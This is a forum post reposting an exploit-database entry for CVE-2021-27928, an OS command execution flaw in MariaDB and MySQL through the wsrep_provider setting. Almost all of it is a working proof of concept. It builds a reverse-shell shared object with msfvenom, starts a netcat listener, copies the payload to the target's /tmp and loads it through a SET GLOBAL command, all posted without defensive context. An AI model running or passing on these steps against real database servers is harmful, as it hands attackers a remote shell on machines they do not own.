This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution # Date: 03/18/2021 # Exploit Author: Central InfoSec # Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL # Tested on: Linux # CVE : CVE-2021-27928 # Proof of Concept: # Create the reverse shell payload msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so # Start a listener nc -lvp <port> # Copy the payload to the target machine (In this example, SCP/SSH is used) scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so # Execute the payload mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";' Link to comment Share on other sites More sharing options...
Recommended Posts